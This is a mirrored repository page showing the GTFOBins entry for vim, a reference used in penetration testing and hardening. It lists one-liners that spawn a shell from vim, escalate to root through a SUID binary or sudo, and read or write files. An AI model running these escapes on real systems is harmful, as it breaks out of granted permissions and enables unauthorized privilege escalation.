This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-30 16:28:45 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
7822ec33e88c24a0b16db48148ccb9f2848b9cf1
GTFOBins.github.io
/
_gtfobins
/
vim.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
351 B
Raw
Blame
History
functions
functions
execute-interactive
file-write
file-read
suid-enabled
sudo-enabled
code
vim -c ':!/bin/sh'
code
vim :set shell=/bin/sh :shell
code
vim file_to_write w
code
vim file_to_read
code
./vim -c ':!/bin/sh -p'
code
sudo vim -c ':!/bin/sh'
Reference in New Issue
View Git Blame
Copy Permalink